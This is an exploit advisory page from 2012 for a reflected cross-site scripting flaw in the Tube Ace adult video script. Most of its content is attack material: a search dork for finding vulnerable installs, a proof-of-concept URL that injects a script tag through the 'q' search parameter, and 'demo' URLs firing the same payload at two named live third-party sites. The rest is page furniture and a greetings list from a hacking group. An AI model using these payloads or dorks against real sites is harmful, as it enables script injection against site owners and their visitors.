Tube Ace Cross Site Scripting

2012.02.16

Credit: Daniel Godoy

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: \"?viewStandard=0\"

# Exploit Title: Tube Ace(Adult PHP Tube Script) XSS Vulnerability
# Date: 15/02/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Tube Ace
# http://www.tubeace.com
# Tested on: Linux
# Dork: "?viewStandard=0"

[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
 Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial.
 her0, r0dr1 y demas user de RemoteExecution
 www.remoteexecution.info www.remoteexcution.com.ar
 #RemoteExecution Hacking Group

[PoC]

http://localhost/mobile/search/?q=[XSS]

http://localhost/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=

[DEMO]

http://www.tubeclipz.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=

http://smoketube.tv/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C%2Fscript%3E&channel=

-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com

References:

http://www.tubeace.com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Tube Ace Cross Site Scripting

Dork: \"?viewStandard=0\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.